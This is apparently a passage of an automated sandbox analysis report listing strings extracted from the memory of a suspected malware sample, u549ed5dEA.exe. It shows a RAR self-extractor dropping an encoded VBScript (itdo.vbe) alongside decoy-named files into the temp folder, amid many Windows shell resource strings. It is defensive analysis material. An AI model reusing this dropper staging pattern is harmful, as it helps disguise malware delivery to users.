                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: musicmemstr_803c59ac-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: music<memstr_24c8cd8b-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .musicmemstr_7403abe3-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell:::{20d04fe0-3aea-1069-a2d8-08002b30309d}\::{088e3905-0323-4b02-9826-5d99428e115f}memstr_a96f2ed0-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21790memstr_2940e402-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: infotip@%systemroot%\system32\shell32.dll,-12689memstr_18c75e64-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconresource%systemroot%\system32\imageres.dll,-108memstr_a78fb26b-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconindex-237memstr_451d392a-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cookies=memstr_e34d50c7-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sendto0memstr_2014a961-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: startup3memstr_268bd4c8-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: videos6memstr_90645ad7-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: librarymemstr_90e09ef9-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: historymemstr_e03c4ae0-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: videosmemstr_0aa0f70b-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nethoodmemstr_b45dcba8-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: commonmemstr_8cfb9442-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21797memstr_273449a1-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21813jmemstr_ad9c648b-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21787fmemstr_80eba293-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ::{645ff040-5081-101b-9f08-00aa002f954e}rmemstr_b738915b-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21782nmemstr_9e46365d-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\windows.storage.dlllhnmemstr_1e9a4b20-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-12690vmemstr_b210af51-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-12688memstr_acd10e1e-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21782*memstr_94fca550-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-12690&memstr_55b73885-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-10042memstr_013ab305-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21786memstr_ae7ed922-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\internet explorer\quick launchmemstr_a11558e9-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21804memstr_21db123c-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ::{031e4825-7b94-4dc3-b131-e946b44c8dd5}memstr_07cfacbf-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ::{b4fb3f98-c1ea-428d-a78a-d1f5659cba93}memstr_7b493517-c
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21815memstr_aea19634-c
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-1013memstr_ff54390d-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-1005memstr_0aa690e3-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21796memstr_8af0488b-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21762memstr_2ebeeddf-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-12689memstr_eb60fee7-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ::{871c5380-42a0-1069-a2ea-08002b30309d}bmemstr_b427e175-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-12690^memstr_0080d681-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\windows.storage.dllljmemstr_6ee39544-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ::{20d04fe0-3aea-1069-a2d8-08002b30309d}fmemstr_d529c7fc-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21762rmemstr_e2fdd182-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-50704memstr_a23660f7-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21769memstr_966464de-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21799memstr_e1702a7b-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-1002"memstr_aec89e51-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v1(zizmemstr_ff5445c6-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rarsfx0memstr_f887913a-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rarsfx0@memstr_903df599-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (z`z(ziz.memstr_6758e116-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (z`z(ziz.qmemstr_34b4c98f-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\windows.storage.dlllmemstr_e830a695-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-9031memstr_4327e4b8-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21791memstr_e4cec498-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-12690memstr_365e6f2d-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%systemroot%\system32\shell32.dll,-21798memstr_1bbd6da9-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-1040memstr_9221785c-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ::{59031a47-3f72-44a7-89c5-5595fe6b30ee}memstr_52c93b84-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: videos>memstr_654647b6-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .videosmemstr_8e2809c7-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\storage#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}memstr_825eaee0-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21779memstr_2ca45517-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: infotip@%systemroot%\system32\shell32.dll,-12688memstr_d70e3db8-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconresource%systemroot%\system32\imageres.dll,-113memstr_50a259cf-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconindex-236memstr_c85ecee9-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ::{59031a47-3f72-44a7-89c5-5595fe6b30ee}\{7d1d3a04-debb-4115-95cf-2f29da2920da}memstr_96a54066-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21791
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: infotip@%systemroot%\system32\shell32.dll,-12690
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: iconresource%systemroot%\system32\imageres.dll,-189
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: iconindex-238
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: downloads
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: downloadsd
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .downloads
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\storage#volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21798
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: iconresource%systemroot%\system32\imageres.dll,-184
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user\appdata\local\temp\rarsfx0\itdo.vbe1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%systemroot%\system32\windows.storage.dll,-21790
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shell:::{89d83576-6bd1-4c86-9454-beb04e94c819}\*
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%systemroot%\system32\windows.storage.dll,-34575
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%systemroot%\system32\windows.storage.dll,-21818
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%systemroot%\system32\windows.storage.dll,-34582
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wt0 wt
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%systemroot%\system32\settingsynccore.dll,-1024
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shell:::{bd7a2e7b-21cb-41b2-a086-b309680c6b7e}\*
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%commonprogramfiles%\system\wab32res.dll,-10200m
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%systemroot%\system32\windows.storage.dll,-34583[
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%systemroot%\system32\windows.storage.dll,-34584i
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%systemroot%\system32\windows.storage.dll,-21791g
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%systemroot%\system32\windows.storage.dll,-21798u
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%systemroot%\system32\windows.storage.dll,-21829
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%systemroot%\system32\windows.storage.dll,-21824
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%systemroot%\system32\windows.storage.dll,-34620/
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: iconresource
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user\appdata\local\microsoft\onedrive\onedrive.exe,1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: iconresourcec:\users\user\appdata\local\microsoft\onedrive\onedrive.exe,1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%systemroot%\system32\windows.storage.dll,-34583
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%systemroot%\system32\windows.storage.dll,-21825
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%systemroot%\system32\windows.storage.dll,-21823
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%systemroot%\system32\windows.storage.dll,-21826
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%systemroot%\system32\windows.storage.dll,-34595
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%systemroot%\system32\windows.storage.dll,-21827
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%systemroot%\system32\windows.storage.dll,-21770i
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%systemroot%\system32\windows.storage.dll,-21779g
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @%commonprogramfiles%\system\wab32res.dll,-10100u
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\c
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\q
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\volume{1a4b1382-eeb5-4d59-b0fa-b93f83a518e1}\
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: onedriveb
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .onedrive
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: /c:\x1dw(m
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: t1(ziz
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dwsl(ziz.
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dwsl(ziz.2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1(f
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dwsl(zcz.
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dwsl(zcz.\
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: t?temp
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: clsid\{0e5aae11-a475-4c5b-ab00-c66de400274e}
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .}$py
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @6|l(
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %)yai
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: about
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: blank
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dummy
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ntfsl
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .vbeo
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ntfsm
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nc`%&
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fat32
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ncalrpc
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: lsasspirpco
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: lsasspirpcg
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: parentfolder
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\userss
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: image/bmp
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: richedit20a?
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: epmapper3
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 910646
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: epmapper
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: setup.exe,0
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\c:\users\user\appdata\local\temp\rarsfx0
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: itdo.vbe
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: yn5 itdo.vbeb
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (zbz(zbz.
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (zbz(zbz.
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .iitdo.vbe
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\windows\syswow64\onecorecommonproxystub.dll[
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\windows\syswow64\onecorecommonproxystub.dllh
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\c:\users\user\appdata\local\temp\rarsfx0e
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kaje~1.doc
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: yr5 kaje~1.docd
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (zbz(zbz.y
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kaje.docx
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: xfer.das
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: yr5 xfer.dasb
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (zbz(zbz.j
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user\appdata\local\temp\rarsfx0i)
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avqj.mp2
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avqj.mp2b
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (zbz(ziz.
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (zbz(ziz.!
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: p{fdd39ad0-238f-46af-adb4-6c85480369c7}f03
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: oxtra.xl
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: yr5 oxtra.xlb
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (zbz(zbz.m
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wdsw.bmp
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: yr5 wdsw.bmpb
